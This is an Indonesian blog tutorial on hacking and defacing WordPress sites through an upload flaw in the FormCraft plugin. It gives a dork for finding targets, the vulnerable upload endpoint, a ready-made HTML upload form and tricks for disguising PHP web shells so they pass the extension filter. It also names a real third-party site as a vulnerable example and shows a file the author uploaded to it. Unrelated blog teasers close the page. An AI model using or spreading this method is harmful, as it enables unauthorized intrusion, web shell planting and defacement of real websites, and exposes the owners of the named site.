Langsung ke konten utama

Hack WordPress Dengan Memanfaatkan Bug Dari Plugin FromCraft 2.0

Hikigaya, Ayanokouji

Hack WordPress Dengan Memanfaatkan Bug Dari Plugin FromCraft 2.0 - Sesuai dengan judul postingan, kali ini saya akan memberikan tutorial untuk melakukan hacking atau deface sebuah website.

Target kita kali ini adalah situs yang menggunakan CMS WordPress, dan kita akan memanfaatkan kelamahan dari plugin FromCraft yang terinstall di situs target.

Dork : inurl:"/wp-content/plugins/formcraft/"
Exploit : /wp-content/plugins/formcraft/file-upload/server/content/upload.php
Target yang vuln akan memunculkan tulisan seperi ini : {"failed":"No file found 2"}


Silahkan dorking dulu untuk mencari target. Dork bisa kalian kembangkan sendiri biar lebih mantap.



Berikut ini adalah salah satu contoh target yang vuln.

http://www.giien.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php

Setelah mendapatkan target yang vuln, selanjutnya kita akan menggunakan CSRF untuk mengupload file kita.

***CSRF***
<form method="POST" action="[Alamat_Target]/wp-content/plugins/formcraft/file-upload/server/content/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Kemudian, simpan kode CSRF yang telah saya berikan dalam format html, dan jangan lupa untuk mengganti [Alamat_Target] sesuai dengan alamat dari target kita.

Untuk nama filenya terserah kamu, yang penting adalah format harus .html

Setelah itu, buka file CSRF yang telah kita buat tadi menggunakan web browser.


Sekarang pilih file yang ingin kamu upload, dan tekan Upload.

Jika muncul tulisan seperti pada gambar dibawah ini, berarti file kita telah berhasil tersimpan di website target.


Perlu diperhatikan, bahwa nama file yang kita upload akan berubah setelah diproses oleh server.

Dalam kasus ini, file yang saya upload bernama "arter.html" kemudian berubah nama menjadi "15d9606bedf01e---arter.html".

Sekarang kita tinggal mengakses file yang telah diupload tadi.


Direktori file kita : target/wp-content/plugins/formcraft/file-upload/server/content/files/nama_filekamu

Dan hasilnya akan seperti ini:

http://www.giien.com/wp-content/plugins/formcraft/file-upload/server/content/files/15d9606bedf01e---arter.html

Kalo kamu mau menebas index website, silahkan upload shell andalah kamu.

Jenis ekstensi yang didukung : namafile.html, namafile.php, namafile,jpg, namafile.gif.

Untuk upload shell, kamu bisa menyamarkannya dengan menggunakan namafile.php.jpg, namafile.php5, namafile.phtml, namafile.php;.gif, dan sebagainya. Silahkan gunakan otak kamu.

Btw, jika balasan dari website adalah {"failed":"Not writable"}, berarti bug di web itu telah diperbaiki.

Beberapa contoh target yang masih vuln:



Goodluck.

Postingan populer dari blog ini

Cara Menyambungkan Hotshare HTTP Injector di Sistem Operasi Linux

Buat kalian yang belum tahu, HTTP Injector adalah salah satu aplikasi android yang bisa digunakan untuk mengakses internet secara gratis. Sebenarnya masih banyak fungsi lain dari aplikasi ini tetapi saya tidak akan membahasnya. Silahkan cari informasinya sendiri. Sedikit informasi, sebenarnya dari aplikasi HTTP Injector-nya sudah ada fitur untuk berbagi hotspot kita, tetapi cari ini hanya bisa digunakan untuk hp yang memiliki akses root. Karena beberapa alasan saya belum melakukan root untuk hp yang saya gunakan. Hal  ini merupakan suatu masalah karena jika kita mengaktifkan hotspot saat menggunakan HI pada perangkat yang belum di root, maka perangkat lain yang tersambung di hotspot kita tidak bisa ikut menikmati akses internet gratisnya. Untungnya, sang pembuat aplikasi ini telah menyediakan fitur Hotshare yang bisa memudahkan kita yang hpnya belum di root. Setelah di aktifkan, kita tinggal mengikuti tutorial yang ada. Sayangnya, di situs guide tersebut tidak ada tutorial untuk si...
Lanjutkan membaca...

Review Anime Choujin Koukousei-tachi wa Isekai demo Yoyuu de Ikinuku you desu!

Informasi Choujin Koukousei-tachi wa Isekai demo Yoyuu de Ikinuku you desu! ( 超人高校生たちは異世界でも余裕で生き抜くようです! ) atau dalam bahasa Inggrisnya disebut CHOYOYU!: High School Prodigies Have It Easy Even in Another World! adalah anime yang tayang pada musim gugur (fall) tahun 2019. Anime dengan genre fantasi ini diadaptasi dari light novel dan dikerjakan oleh studio yang bernama Project No.9 Sinopsis Tujuh siswa sekolah menengah yang berasal dari Jepang sangat terkenal karena kemampuan yang dimiliki mereka. Suatu hari mereka mengalami kecelakaan saat sedang menaiki pesawat. Saat sadar dari kecelakaan, ternyata mereka telah berada di dunia fantasi abad pertengahan Freyjagard, dimana dua ras manusia hidup berdampingan. Ketujuh orang jenius ini diselamatkan oleh Winuma byuma dan putri angkatnya Lyrule,dan merekapun berjanji untuk menggunakan kemampuan mereka untuk membalas kebaikan yang telah mereka terima sambil mencari cara untuk pulang kerumah. Karakter Tsukasa Mikogami Tsukas...
Lanjutkan membaca...